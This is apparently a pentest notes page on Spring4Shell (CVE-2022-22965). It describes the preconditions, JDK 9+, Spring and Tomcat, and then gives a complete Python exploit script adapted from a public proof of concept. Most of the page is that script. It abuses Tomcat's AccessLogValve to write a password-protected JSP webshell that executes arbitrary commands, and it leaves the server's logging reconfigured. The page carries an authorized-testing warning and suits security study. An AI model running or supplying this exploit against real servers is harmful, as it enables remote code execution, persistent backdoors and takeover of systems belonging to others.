๐Ÿƒ
Spring4Shell (CVE-2022-22965)
Spring Framework is an open-source application framework for Java. On JDK 9+, an application that binds request parameters to Java beans exposes the `class.module.classLoader...` property path; through it an attacker can reach Tomcat's AccessLogValve object and set its fields (pattern, directory, prefix, suffix, fileDateFormat) so that the access-log pipeline writes attacker-controlled content to a file at a path of the attacker's choosing. The exploit below uses this to drop a JSP webshell under Tomcat's `webapps/` directory.
Conditions:
  • JDK 9.0+ (the binding path starts with `class.module`, and `Class.getModule()` only exists from Java 9)
  • Spring Framework, or a framework built on it, on the classpath — check for spring-beans-*.jar (see the `find` command at the bottom of this page)
  • Deployed on Apache Tomcat: the exploit repurposes Tomcat's AccessLogValve and writes the shell under Tomcat's `webapps/` directory (the original PoC targets WAR deployments on Tomcat; embedded or non-Tomcat deployments are not covered by it)
Exploit (only run this against systems you are authorized to test — it writes a JSP webshell into the target's `webapps/` directory and leaves Tomcat's access-log valve reconfigured until someone restores it):
#!/usr/bin/env python3
# Spring4Shell Exploit
# Original Exploit: https://github.com/BobTheShoplifter/Spring4Shell-POC/
# Modified by: AG | MuirlandOracle
import argparse
from urllib.parse import urlencode, urljoin

import requests
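def _build_payload(filename, password, directory):
    """Return ``(headers, body)`` that turn Tomcat's AccessLogValve into a JSP dropper.

    The form body binds into
    ``class.module.classLoader.resources.context.parent.pipeline.first`` (the
    AccessLogValve in the Host pipeline) and sets:

    * ``pattern``        - the JSP source that gets written for every logged request,
    * ``directory``      - ``webapps/<directory>`` (concatenated verbatim, so ``..``
                           in ``directory`` would escape ``webapps/``),
    * ``prefix``/``suffix`` - ``<filename>`` and ``.jsp``,
    * ``fileDateFormat`` - empty, so no date is inserted between prefix and suffix
                           and the file is exactly ``webapps/<directory>/<filename>.jsp``.

    ``%`` is the directive marker of the access-log pattern, so the JSP delimiters
    and ``Runtime`` are not written literally; they are sent as request headers and
    pulled into the pattern with ``%{c2}i`` / ``%{c1}i``.  The ``suffix`` header
    closes the scriptlet and comments out the rest of the log line.

    Raises:
        ValueError: if ``password`` cannot be embedded in a Java string literal.
    """
    if any(ch in password for ch in '"\\\r\n'):
        raise ValueError(
            "password must not contain double quotes, backslashes or newlines "
            "(it is embedded in a Java string literal inside the JSP)"
        )

    # new String(b, 0, a) - only the bytes read in this iteration; the original
    # new String(b) echoed the whole 2048-byte buffer, i.e. stale bytes from the
    # previous chunk plus trailing NULs after the last one.
    jsp = (
        '%{c2}i if("' + password + '".equals(request.getParameter("pwd"))){ '
        "java.io.InputStream in = %{c1}i.getRuntime().exec("
        'request.getParameter("cmd")).getInputStream(); '
        "int a = -1; byte[] b = new byte[2048]; "
        "while((a=in.read(b))!=-1){ out.println(new String(b,0,a)); } } %{suffix}i"
    )

    valve = "class.module.classLoader.resources.context.parent.pipeline.first"
    fields = {
        f"{valve}.pattern": jsp,
        f"{valve}.suffix": ".jsp",
        f"{valve}.directory": f"webapps/{directory}",
        f"{valve}.prefix": filename,
        f"{valve}.fileDateFormat": "",
    }
    headers = {
        "suffix": "%><!--//",
        "c1": "Runtime",
        "c2": "<%",
        "DNT": "1",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    # urlencode percent-encodes the password and the pattern's '%'/'{'/'"' properly;
    # the original hand-encoded string spliced the raw password into the body.
    return headers, urlencode(fields)


def exploit(url, filename, password, directory):
    """Drop a password-protected JSP shell at ``webapps/<directory>/<filename>.jsp``.

    Args:
        url: URL of a Spring MVC endpoint that binds request parameters to a bean.
        filename: Shell file name without extension (the valve appends ``.jsp``).
        password: Value the shell expects in its ``pwd`` parameter before it runs ``cmd``.
        directory: Webapp directory under Tomcat's ``webapps/`` to write the shell into.

    Returns:
        True if the probe of the dropped shell answered HTTP 200, False otherwise.

    Raises:
        ValueError: if ``password`` contains characters that would break the JSP.

    Operational notes:
      * TLS verification is disabled (``verify=False``), as in the original PoC.
      * The target's access-log valve stays reconfigured; every later request appends
        another copy of the JSP source to the shell file.  Nothing here reverts that.
      * The probe URL is resolved relative to ``url`` with urljoin, which matches the
        default ``ROOT`` webapp; for another ``directory`` the shell normally lives at
        ``/<directory>/<filename>.jsp`` instead, so point ``url`` at that context.
    """
    headers, body = _build_payload(filename, password, directory)
    shell_url = urljoin(url, f"{filename}.jsp")
    try:
        requests.post(url, headers=headers, data=body, timeout=15,
                      allow_redirects=False, verify=False)
        # The GET confirms the file exists; it is itself logged through the valve,
        # so it appends to the file too.  No pwd is sent, so nothing is executed.
        probe = requests.get(shell_url, timeout=15, allow_redirects=False, verify=False)
    except requests.RequestException as exc:
        print(f"Request to {url} failed: {exc}")
        return False

    if probe.status_code != 200:
        print("Exploit failed to upload")
        return False

    query = urlencode({"pwd": password, "cmd": "whoami"})
    print(f"Shell Uploaded Successfully!\nYour shell can be found at: {shell_url}?{query}")
    return True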
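if __name__ == "__main__":
    # CLI front-end: collect target URL, shell name, shell password and target webapp,
    # then hand them to exploit().  Authorized testing only - see exploit() for what it
    # leaves behind on the target.
    parser = argparse.ArgumentParser(description="Spring4Shell RCE Proof of Concept")
    parser.add_argument("url", help="Target URL")
    parser.add_argument("-f", "--filename",
                        help="Name of the file to upload (Default tomcatwar.jsp)",
                        default="tomcatwar.jsp")
    parser.add_argument("-p", "--password",
                        help="Password to protect the shell with (Default: thm)",
                        default="thm")
    parser.add_argument("-d", "--directory",
                        help="The upload path for the file (Default: ROOT)",
                        default="ROOT")
    args = parser.parse_args()

    # The valve always appends ".jsp", so only the stem is passed on.  rsplit keeps
    # dots inside the name ("my.shell.jsp" -> "my.shell"); split(".")[0] truncated
    # such names to "my".
    stem = args.filename.rsplit(".", 1)[0]
    exploit(args.url, stem, args.password, args.directory)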
Resources:
GitHub - BobTheShoplifter/Spring4Shell-POC: Spring4Shell Proof Of Concept/Information CVE-2022-22965
GitHub
Original proof of concept that the script above is adapted from
Spring Framework RCE, Early Announcement
springcentral
Official Spring announcement of CVE-2022-22965 with vulnerability details
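# Condition check: is spring-beans on the target's classpath?  Run from the
# application root (or Tomcat's webapps/); in an unpacked WAR the jar normally
# sits under WEB-INF/lib/, which a recursive find from the app root reaches.
# The pattern is quoted so the shell does not expand it first: an unquoted
# glob that matches files in the current directory turns into extra path
# arguments and breaks find ("paths must precede expression").
find . -name 'spring-beans*.jar'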